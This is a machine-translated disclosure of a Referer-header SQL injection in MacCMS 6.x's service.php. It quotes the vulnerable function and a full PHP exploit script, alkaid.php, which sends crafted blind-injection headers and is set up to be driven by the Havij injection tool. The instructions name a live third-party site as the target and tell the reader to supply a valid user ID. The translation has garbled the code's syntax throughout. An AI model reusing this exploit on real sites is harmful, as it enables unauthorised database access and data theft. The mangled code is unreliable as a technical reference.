Injection caused by improper handling of MacCMS 6.x referer

/User/service. php

Function Popularize () {global $ db; $ userid = safeData ("userid", "get"); if (! IsNum ($ userid) {die ("the user is invalid. Please log in again! ") ;}$ Ip = getip (); $ Ly =$ _ SERVER [" HTTP_REFERER "]; $ row = $ db-> getRow ("select * from tbl_user where u_id = ". $ userid. ""); if ($ row) {$ SQL = "Select * From tbl_user_visit where uv_userid = ". $ userid. "and uv_ip = '". $ Ip. "'and STR_TO_DATE (uv_time,' % Y-% m-% D') = '". date ("Y-m-d "). "'"; $ rsUv = $ db-> query ($ SQL); $ nums = $ db-> num_rows ($ rsUv); if ($ nums = 0) {$ db-> query ("insert tbl_user_visit (uv_userid, uv_ip, uv_ly, uv_time) values ('". $ userid. "','". $ Ip. "','". $ Ly. "','". date ('Y-m-d H: I: s', time ()). "')"); $ db-> query ("update tbl_user set u_popularizenum = u_popularizenum + 1, u_points = u_points + ". app_userpopularize. "where u_id = ". $ userid); $ SQL = "Delete From tbl_user_visit where STR_TO_DATE (uv_time, '% Y-% m-% D') <'". date ("Y-m-d "). "'"; $ db-> query ($ SQL) ;}} die ("<SC ". "riptype = \" text/javascript \ "> location. href = '". getIndexLink (). "'; </SC ". "ript> ");}

$ Ly = $ _ SERVER ["HTTP_REFERER"]; SQL INSERT

So we shot it,

The following vulnerability proofs are attached to PHP exploit

 

Alkaid. php usage: Modify the following uc_fopen (' http://www.391.net/user/service.php?action=popularize&userid=597 ', 0, FALSE, '', 15, true, $ _ GET [". php address format, and then enter a valid ID in the userid = 597 location (important !!!) Then convert alkaid. php? A = 1 address for Havij to inject [php] with MySQL Blind. <? Phpfunction uc_fopen ($ url, $ limit = 0, $ post = '', $ cookie ='', $ bysocket = FALSE, $ ip = '', $ timeout = 15, $ block = TRUE, $ inject) {$ return = ''; $ matches = parse_url ($ url );! Isset ($ matches ['host']) & $ matches ['host'] = '';! Isset ($ matches ['path']) & $ matches ['path'] = '';! Isset ($ matches ['query']) & $ matches ['query'] = '';! Isset ($ matches ['Port']) & $ matches ['Port'] = ''; $ host = $ matches ['host']; $ path = $ matches ['path']? $ Matches ['path']. ($ matches ['query']? '? '. $ Matches ['query']: ''):'/'; $ port =! Empty ($ matches ['Port'])? $ Matches ['Port']: 80; if ($ post) {$ out = "POST $ path HTTP/1.0 \ r \ n"; $ out. = "Accept: ** \ r \ n"; // $ out. = "Referer: $ boardurl \ r \ n"; $ out. = "Accept-Language: zh-cn \ r \ n"; $ out. = "User-Agent: $ _ SERVER [HTTP_USER_AGENT] \ r \ n"; $ out. = "Host: $ host \ r \ n"; $ out. = "Connection: Close \ r \ n"; $ out. = "Cookie: $ cookie \ r \ n";} else {$ out = "GET $ path HTTP/1.0 \ r \ n"; $ out. = "Accept: */* \ r \ n"; $ out. = "Referer: A', (select now () and ". $ inject. ") # \ r \ n"; $ out. = "Accept-Language: zh-cn \ r \ n"; $ out. = "User-Agent: $ _ SERVER [HTTP_USER_AGENT] \ r \ n"; $ out. = "Host: $ host \ r \ n"; $ out. = "Connection: Close \ r \ n"; $ out. = "Cookie: $ cookie \ r \ n";} $ fp = @ fsockopen ($ ip? $ Ip: $ host), $ port, $ errno, $ errstr, $ timeout); if (! $ Fp) {return ''; // note $ errstr: $ errno \ r \ n} else {stream_set_blocking ($ fp, $ block); stream_set_timeout ($ fp, $ timeout); @ fwrite ($ fp, $ out); $ status = stream_get_meta_data ($ fp); if (! $ Status ['timed _ out']) {while (! Feof ($ fp) {if ($ header = @ fgets ($ fp )) & ($ header = "\ r \ n" | $ header = "\ n") {break ;}$ stop = false; while (! Feof ($ fp )&&! $ Stop) {$ data = fread ($ fp, ($ limit = 0 | $ limit> 8192? 8192: $ limit); $ return. = $ data; if ($ limit) {$ limit-= strlen ($ data); $ stop = $ limit <= 0 ;}}@ fclose ($ fp ); return $ return ;}} uc_fopen (' http://www.391.net/user/service.php?action=popularize&userid=597 ', 0, 0, FALSE, '', 15, true, $ _ GET [" a "]); echo 'Hi';?>

391.net lay down the gun to prove it to us (the official website does not come with the demonstration results)

This problem does not exist in the latest 7.x version.